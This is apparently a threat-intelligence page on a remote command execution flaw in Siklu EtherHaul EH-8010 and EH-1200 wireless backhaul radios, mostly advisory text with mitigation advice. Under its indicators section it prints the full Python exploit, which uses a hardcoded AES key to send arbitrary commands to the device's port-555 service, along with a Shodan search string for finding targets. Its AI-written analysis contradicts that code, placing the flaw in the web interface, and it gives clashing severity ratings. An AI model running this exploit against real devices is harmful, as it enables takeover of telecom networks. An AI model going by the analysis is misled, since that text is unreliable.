Siklu EtherHaul Series EH-8010 - Remote Command Execution
The Siklu EtherHaul Series EH-8010 devices are vulnerable to a remote command execution (RCE) exploit, allowing attackers to execute arbitrary commands on affected devices remotely. This vulnerability can be exploited over the network via the device's web interface, potentially leading to full system compromise. Exploit code is publicly available in Python, increasing the risk of exploitation. Although no known exploits are currently observed in the wild, the presence of exploit code and the nature of the vulnerability make it a significant threat. The vulnerability affects network infrastructure devices commonly used for high-capacity wireless backhaul links, which are critical for telecommunications and enterprise networks. European organizations relying on Siklu EtherHaul EH-8010 for network connectivity could face service disruption, data breaches, or unauthorized network access. Mitigation is complicated by the absence of official patches, requiring network segmentation, access restrictions, and monitoring to reduce risk. Countries with extensive telecommunications infrastructure and deployments of Siklu devices, such as Germany, France, the UK, and the Netherlands, are most likely to be impacted. Given the ease of exploitation and potential impact on confidentiality, integrity, and availability, the threat severity is assessed as high. Defenders should prioritize identifying affected devices, restricting management interface access, and applying compensating controls until a patch is available.
AI Analysis
Technical Summary
The Siklu EtherHaul Series EH-8010 devices suffer from a remote command execution vulnerability that allows unauthenticated attackers to execute arbitrary system commands remotely via the device's web interface. This exploit targets the network management functionality, leveraging insufficient input validation or authentication bypass to gain command execution privileges. The vulnerability is significant because it affects critical wireless backhaul devices used to provide high-capacity point-to-point network links, often forming the backbone of enterprise and telecommunications networks. The exploit code, written in Python, is publicly available on Exploit-DB (ID 52466), facilitating exploitation by attackers with moderate technical skills. Although no active exploitation in the wild has been reported, the availability of exploit code increases the likelihood of future attacks. The lack of official patches or mitigation guidance from Siklu complicates remediation efforts. European organizations using these devices may face risks including unauthorized network access, interception or manipulation of network traffic, disruption of network services, and potential lateral movement within networks. The vulnerability's exploitation could compromise the confidentiality, integrity, and availability of network communications, impacting critical infrastructure and services. Given the strategic importance of telecommunications infrastructure in Europe and the deployment of Siklu devices in several countries, this vulnerability poses a tangible threat. The absence of authentication requirements and the remote nature of the exploit increase the attack surface. Organizations must implement network-level protections, restrict access to management interfaces, and monitor for suspicious activity to mitigate risk until official patches are released.
Potential Impact
For European organizations, exploitation of this vulnerability could lead to severe operational disruptions, including denial of service or unauthorized control over critical network infrastructure. Telecommunications providers relying on Siklu EtherHaul EH-8010 devices for wireless backhaul links may experience compromised network integrity and confidentiality, potentially affecting large numbers of customers and critical services. Enterprises using these devices for private network connectivity risk data breaches and lateral movement by attackers, which could lead to further compromise of internal systems. The impact extends to public safety and emergency services if communication links are disrupted. Additionally, the potential for attackers to use compromised devices as footholds within networks increases the risk of broader cyberattacks. The medium severity rating provided may underestimate the real-world impact given the critical role of these devices in network infrastructure. The availability of exploit code lowers the barrier for exploitation, increasing the threat to European organizations. Without timely mitigation, the vulnerability could be leveraged in targeted attacks or by opportunistic threat actors, including cybercriminals or state-sponsored groups.
Mitigation Recommendations
1. Immediately identify and inventory all Siklu EtherHaul EH-8010 devices within the network. 2. Restrict access to the management web interface by implementing network segmentation and firewall rules that limit access to trusted IP addresses only. 3. Disable remote management interfaces if not required or restrict them to secure VPN connections. 4. Monitor network traffic and device logs for unusual activity indicative of exploitation attempts, such as unexpected command execution or configuration changes. 5. Implement strict authentication and authorization controls around device management, including strong passwords and multi-factor authentication if supported. 6. Engage with Siklu support or vendors to obtain any available patches or firmware updates addressing this vulnerability. 7. Consider deploying intrusion detection/prevention systems (IDS/IPS) with signatures tuned to detect exploitation attempts against this device. 8. Plan for device replacement or upgrade if no patch is forthcoming, prioritizing critical network segments. 9. Educate network operations teams about the vulnerability and the importance of rapid incident response. 10. Maintain up-to-date backups of device configurations to enable rapid recovery if compromise occurs.
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain
Indicators of Compromise
- exploit-code: # Exploit Title:Siklu EtherHaul Series EH-8010 - Remote Command Execution # Shodan Dork: "EH-8010" or "EH-1200" # Date: 2025-08-02 # Exploit Author: semaja2 - Andrew James <semaja2@gmail.com> # Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon # Software Link: ftp://ftp.bubakov.net/siklu/ # Version: EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3 # Tested on: Linux # CVE: CVE-2025-57174 # Blog: https://semaja2.net/2025/08/02/siklu-eh-unauthenticated-rce/ #!/usr/bin/env python3 import argparse, socket, struct from Crypto.Cipher import AES PORT = 555 HDR_LEN = 0x90 IV0 = struct.pack('<4I', 0xEA703B82, 0x75A9A17B, 0x1DFC7BB9, 0x55A24D72) KEY = bytes([ 0x89,0xE7,0xFF,0xBE,0xEB,0x2D,0x73,0xF5, 0xA9,0x10,0xFC,0x42,0x5B,0x1F,0x36,0x17, 0x9F,0xB9,0x5E,0x75,0x35,0xA3,0x42,0xA0, 0x5D,0x02,0x48,0xB1,0x19,0xD2,0x4B,0x82 ]) def recv_exact(sock: socket.socket, n: int) -> bytes: out = bytearray() while len(out) < n: chunk = sock.recv(n - len(out)) if not chunk: raise ConnectionError('socket closed') out += chunk return bytes(out) def pad16_zero(b: bytes) -> bytes: r = len(b) & 0x0F return b if r == 0 else (b + b'\x00' * (16 - r)) def hdr_checksum(hdr: bytes) -> int: return (sum(hdr[0:0x0C]) + sum(hdr[0x10:HDR_LEN])) & 0xFFFFFFFF def build_header(flag: int, msg: int, payload_len: int) -> bytes: hdr = bytearray(HDR_LEN) hdr[0] = flag & 0xFF hdr[1] = msg & 0xFF struct.pack_into('<I', hdr, 0x08, payload_len & 0xFFFFFFFF) struct.pack_into('<I', hdr, 0x0C, hdr_checksum(hdr)) return bytes(hdr) class RFPipeSession: def __init__(self, key: bytes, iv0: bytes): self.key = key self.send_iv = iv0 self.recv_iv = iv0 def enc_send(self, sock: socket.socket, data: bytes) -> None: cipher = AES.new(self.key, AES.MODE_CBC, iv=self.send_iv) ct = cipher.encrypt(data) self.send_iv = ct[-16:] sock.sendall(ct) def dec_recv(self, sock: socket.socket, n_plain: int) -> bytes: if n_plain <= 0: return b'' n_padded = (n_plain + 15) & ~15 ct = recv_exact(sock, n_padded) cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv) pt = cipher.decrypt(ct) self.recv_iv = ct[-16:] return pt[:n_plain] def send_header(self, sock: socket.socket, hdr_plain: bytes) -> None: if len(hdr_plain) != HDR_LEN: raise ValueError('header must be 0x90 bytes') self.enc_send(sock, hdr_plain) def recv_header(self, sock: socket.socket) -> bytes: ct = recv_exact(sock, HDR_LEN) cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv) pt = cipher.decrypt(ct) self.recv_iv = ct[-16:] return pt def connect_any(host: str, port: int) -> socket.socket: infos = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM) last_err = None for fam, st, proto, _, sa in infos: s = socket.socket(fam, st, proto) try: s.connect(sa) return s except Exception as e: last_err = e s.close() raise ConnectionError(f'connect failed: {last_err}') def main(): ap = argparse.ArgumentParser(description='rfpiped command client (msg 0x01)') ap.add_argument('target', help='IPv4/IPv6 address') ap.add_argument('command', help='command string (e.g., "mo-info system")') ap.add_argument('--nul', action='store_true', help='append NUL terminator to command') ap.add_argument('--recv', action='store_true', help='receive and print response') args = ap.parse_args() payload = args.command.encode('utf-8') if args.nul: payload += b'\x00' hdr_plain = build_header(flag=0x00, msg=0x01, payload_len=len(payload)) sess = RFPipeSession(KEY, IV0) with connect_any(args.target, PORT) as s: sess.send_header(s, hdr_plain) if payload: sess.enc_send(s, pad16_zero(payload)) if args.recv: rh = sess.recv_header(s) flag = rh[0]; rmsg = rh[1] rlen = struct.unpack_from('<I', rh, 0x08)[0] print(f'Response: flag=0x{flag:02x} msg=0x{rmsg:02x} length={rlen}') if rmsg in (0x03, 0x05): return if rlen: body = sess.dec_recv(s, rlen) if body.endswith(b'\x00'): body = body[:-1] try: print(body.decode('utf-8', errors='replace')) except Exception: print(body.hex()) if __name__ == '__main__': main()
Siklu EtherHaul Series EH-8010 - Remote Command Execution
Description
The Siklu EtherHaul Series EH-8010 devices are vulnerable to a remote command execution (RCE) exploit, allowing attackers to execute arbitrary commands on affected devices remotely. This vulnerability can be exploited over the network via the device's web interface, potentially leading to full system compromise. Exploit code is publicly available in Python, increasing the risk of exploitation. Although no known exploits are currently observed in the wild, the presence of exploit code and the nature of the vulnerability make it a significant threat. The vulnerability affects network infrastructure devices commonly used for high-capacity wireless backhaul links, which are critical for telecommunications and enterprise networks. European organizations relying on Siklu EtherHaul EH-8010 for network connectivity could face service disruption, data breaches, or unauthorized network access. Mitigation is complicated by the absence of official patches, requiring network segmentation, access restrictions, and monitoring to reduce risk. Countries with extensive telecommunications infrastructure and deployments of Siklu devices, such as Germany, France, the UK, and the Netherlands, are most likely to be impacted. Given the ease of exploitation and potential impact on confidentiality, integrity, and availability, the threat severity is assessed as high. Defenders should prioritize identifying affected devices, restricting management interface access, and applying compensating controls until a patch is available.
AI-Powered Analysis
Technical Analysis
The Siklu EtherHaul Series EH-8010 devices suffer from a remote command execution vulnerability that allows unauthenticated attackers to execute arbitrary system commands remotely via the device's web interface. This exploit targets the network management functionality, leveraging insufficient input validation or authentication bypass to gain command execution privileges. The vulnerability is significant because it affects critical wireless backhaul devices used to provide high-capacity point-to-point network links, often forming the backbone of enterprise and telecommunications networks. The exploit code, written in Python, is publicly available on Exploit-DB (ID 52466), facilitating exploitation by attackers with moderate technical skills. Although no active exploitation in the wild has been reported, the availability of exploit code increases the likelihood of future attacks. The lack of official patches or mitigation guidance from Siklu complicates remediation efforts. European organizations using these devices may face risks including unauthorized network access, interception or manipulation of network traffic, disruption of network services, and potential lateral movement within networks. The vulnerability's exploitation could compromise the confidentiality, integrity, and availability of network communications, impacting critical infrastructure and services. Given the strategic importance of telecommunications infrastructure in Europe and the deployment of Siklu devices in several countries, this vulnerability poses a tangible threat. The absence of authentication requirements and the remote nature of the exploit increase the attack surface. Organizations must implement network-level protections, restrict access to management interfaces, and monitor for suspicious activity to mitigate risk until official patches are released.
Potential Impact
For European organizations, exploitation of this vulnerability could lead to severe operational disruptions, including denial of service or unauthorized control over critical network infrastructure. Telecommunications providers relying on Siklu EtherHaul EH-8010 devices for wireless backhaul links may experience compromised network integrity and confidentiality, potentially affecting large numbers of customers and critical services. Enterprises using these devices for private network connectivity risk data breaches and lateral movement by attackers, which could lead to further compromise of internal systems. The impact extends to public safety and emergency services if communication links are disrupted. Additionally, the potential for attackers to use compromised devices as footholds within networks increases the risk of broader cyberattacks. The medium severity rating provided may underestimate the real-world impact given the critical role of these devices in network infrastructure. The availability of exploit code lowers the barrier for exploitation, increasing the threat to European organizations. Without timely mitigation, the vulnerability could be leveraged in targeted attacks or by opportunistic threat actors, including cybercriminals or state-sponsored groups.
Mitigation Recommendations
1. Immediately identify and inventory all Siklu EtherHaul EH-8010 devices within the network. 2. Restrict access to the management web interface by implementing network segmentation and firewall rules that limit access to trusted IP addresses only. 3. Disable remote management interfaces if not required or restrict them to secure VPN connections. 4. Monitor network traffic and device logs for unusual activity indicative of exploitation attempts, such as unexpected command execution or configuration changes. 5. Implement strict authentication and authorization controls around device management, including strong passwords and multi-factor authentication if supported. 6. Engage with Siklu support or vendors to obtain any available patches or firmware updates addressing this vulnerability. 7. Consider deploying intrusion detection/prevention systems (IDS/IPS) with signatures tuned to detect exploitation attempts against this device. 8. Plan for device replacement or upgrade if no patch is forthcoming, prioritizing critical network segments. 9. Educate network operations teams about the vulnerability and the importance of rapid incident response. 10. Maintain up-to-date backups of device configurations to enable rapid recovery if compromise occurs.
Affected Countries
Technical Details
- Edb Id
- 52466
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Siklu EtherHaul Series EH-8010 - Remote Command Execution
# Exploit Title:Siklu EtherHaul Series EH-8010 - Remote Command Execution # Shodan Dork: "EH-8010" or "EH-1200" # Date: 2025-08-02 # Exploit Author: semaja2 - Andrew James <semaja2@gmail.com> # Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon # Software Link: ftp://ftp.bubakov.net/siklu/ # Version: EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3 # Tested on: Linux # CVE: CVE-2025-57174 # Blog: https://semaja2.net/2025/08/02/siklu-eh-unauthenticated-rce/ #!/usr/bin/env python3 imp... (4159 more characters)
Threat ID: 696c9008d302b072d9ad2abb
Added to database: 1/18/2026, 7:47:20 AM
Last enriched: 2/5/2026, 9:10:51 AM
Last updated: 2/6/2026, 7:31:23 PM
Views: 77
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
ThreatsDay Bulletin: Codespaces RCE, AsyncRAT C2, BYOVD Abuse, AI Cloud Intrusions & 15+ Stories
LowCritical SmarterMail Vulnerability Exploited in Ransomware Attacks
CriticalConcerns Raised Over CISA’s Silent Ransomware Updates in KEV Catalog
MediumSIEM Rules for detecting exploitation of vulnerabilities in FortiCloud SSO
MediumResearchers Expose Network of 150 Cloned Law Firm Websites in AI-Powered Scam Campaign
MediumActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console in Console -> Billing for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.